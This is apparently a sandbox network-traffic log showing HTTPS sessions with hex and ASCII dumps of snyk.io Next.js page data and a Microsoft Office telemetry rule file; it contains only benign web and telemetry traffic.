                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::x72cm-1729799351054-fbbb39593bd8
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799351.1094f32
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15767INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 62 30 31 6f 63 35 78 4b 64 4a 48 72 6e 77 64 33 4f 33 62 4d 6e 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 33 3a 34 31 2e 31 39 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3b01oc5xKdJHrnwd3O3bMn","type":"Entry","createdAt":"2023-12-07T11:13:41.196Z","updatedAt":"2024-05-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8821INData Raw: 32 35 3a 34 32 2e 38 38 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 50 72 6f 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 25:42.885Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":9,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextSingleLine"}},"locale":"en-US"},"fields":{"text":"Prod
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 52 65 70 6f 72 74 73 22 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 49 37 35 52 67 47
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000type":"Link","linkType":"ContentType","id":"contentTextSingleLine"}},"locale":"en-US"},"fields":{"text":"Reports"}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7I75RgG
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8204INData Raw: 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 33 3a 34 33 2e 34 31 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 34 2e 35 39 38 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 30 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: :"Entry","createdAt":"2023-12-07T11:13:43.416Z","updatedAt":"2024-07-16T03:25:44.598Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":31,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"Content
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 74 22 3a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 33 3a 34 33 2e 36 37 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 35 2e 36 30 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 30 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000t":"2023-12-07T11:13:43.670Z","updatedAt":"2024-07-16T03:25:45.606Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":31,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 72 65 61 74 65 64 41 74 22 3a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: reatedAt":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 32 3a 34 35 2e 35 39 34 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 37 2e 30 36 34 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 33 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"2023-12-07T11:12:45.594Z","updatedAt":"2024-07-16T03:25:47.064Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":33,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 61 74 65 64 41 74 22 3a 22 32 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: atedAt":"2
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 38 2e 31 37 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 46 61 71 49 74 65 6d 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000024-07-16T03:25:48.176Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":97,"revision":45,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentFaqItem"}},"locale":"en-US"},"fie
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8204INData Raw: 7b 22 69 63 6f 6e 22 3a 22 6c 6f 63 6b 2d 68 65 61 72 74 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 78 68 4e 59 42 32 45 65 57 4b 33 64 43 50 76 45 72 66 47 48 78 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 65 63 75 72 69 74 79 20 6c 65 61 64 65 72 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 73 65 63 75 72 69 74 79 2d 6c 65 61 64 65 72 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 68 69 65 6c 64 2d 73 74 61 72 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: {"icon":"lock-heart"}}},{"sys":{"id":"3xhNYB2EeWK3dCPvErfGHx","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Security leaders","description":null,"url":"/security-leaders/","appearance":{"navItem":{"icon":"shield-star"}}},{"sys":{"id":"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              92192.168.2.54985313.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 802631a9-901e-002a-57ad-247a27000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-15b8d89586fx2hlt035xdehq580000000f7000000000131g
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              93192.168.2.54985623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC608OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"p9a83itxh1kro"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::nfptb-1729799351193-471221bd03a5
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799351.1f6112b
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15761INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 58 67 58 47 49 6c 79 49 4d 42 4c 78 42 70 76 36 4c 71 39 6f 45 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 30 38 54 31 36 3a 31 31 3a 31 37 2e 30 31 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 31 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6XgXGIlyIMBLxBpv6Lq9oE","type":"Entry","createdAt":"2022-12-08T16:11:17.016Z","updatedAt":"2023-06-13T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16010INData Raw: 68 65 20 66 65 61 74 75 72 65 73 20 69 6e 63 6c 75 64 69 6e 67 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 61 6c 65 72 74 73 2c 20 72 65 61 6c 20 74 69 6d 65 20 73 63 61 6e 20 72 65 73 75 6c 74 73 2c 20 61 6e 64 20 61 63 74 69 6f 6e 61 62 6c 65 20 66 69 78 20 61 64 76 69 63 65 20 77 69 74 68 69 6e 20 79 6f 75 72 20 49 44 45 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79
                                                                                                                                                                                                                                                                                                              Data Ascii: he features including vulnerability alerts, real time scan results, and actionable fix advice within your IDE.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"ty
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 74 20 6f 6e 20 74 68 65 20 71 75 61 6c 69 74 79 20 61 6e 64 20 73 65 63 75 72 69 74 79 20 6f 66 20 63 6f 64 65 20 74 68 61 74 20 64 65 76 65 6c 6f 70 65 72 73 20 77 72 69 74 65 20 67 6f 69 6e 67 20 66 6f 72 77 61 72 64 2e 20 4d 6f 72 65 20 6d 61 69 6e 74 61 69 6e 61 62 6c 65 20 63 6f 64 65 20 63 61 6e 20 61 6c 73 6f 20 69 6d 70 72 6f 76 65 20 74 68 65 20 63 75 73 74 6f 6d 65 72 20 65 78 70 65 72 69 65 6e 63 65 20 62 65 63 61 75 73 65 20 74 68 65 72 65 20 61 72 65 20 66 65 77 65 72 20 62 75 67 73 20 61 6e 64 20 74 65 63 68 6e 69 63 61 6c 20 64 65 62 74 20 74 6f 20 64 65 61 6c 20 77 69 74 68 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61
                                                                                                                                                                                                                                                                                                              Data Ascii: t on the quality and security of code that developers write going forward. More maintainable code can also improve the customer experience because there are fewer bugs and technical debt to deal with in the future.","nodeType":"text"}],"nodeType":"paragra
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC1009INData Raw: 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 6e 79 6b 2d 63 6f 64 65 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4d 73 37 43 38 65 6d 76 43 59 65 78 78 4a 55 37 55 30 6e 73 69 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 4f 70 65 6e 20 53 6f 75 72 63 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 41 76 6f 69 64 20 76 75 6c 6e 65 72 61 62 6c 65 20 64 65 70 65 6e 64 65 6e 63 69 65 73 22 2c 22 75 72 6c 22 3a 22 2f 70 72 6f 64 75 63 74 2f 6f 70 65 6e 2d 73 6f 75 72 63 65 2d 73 65 63 75 72 69 74 79 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: e":{"navItem":{"icon":"snyk-code"}}},{"sys":{"id":"4Ms7C8emvCYexxJU7U0nsi","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk Open Source","description":"Avoid vulnerable dependencies","url":"/product/open-source-security-management/",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 72 6f 64 75 63 74 2f 73 6e 79 6b 2d 61 70 70 72 69 73 6b 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 6e 79 6b 2d 61 70 70 72 69 73 6b 22 7d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 76 42 33 4a 4c 39 64 58 44 71 58 4a 54 68 38 75 4a 46 4e 32 68 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000roduct/snyk-apprisk/","appearance":{"navItem":{"icon":"snyk-apprisk"}}}]}},{"sys":{"id":"2vB3JL9dXDqXJTh8uJFN2h","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenu
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 6f 6e 50 72 69 6d 61 72 79 4e 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: onPrimaryN
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8111INData Raw: 30 30 30 30 31 46 41 33 0d 0a 61 76 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 69 63 69 6e 67 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 6e 73 2f 22 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 43 6f
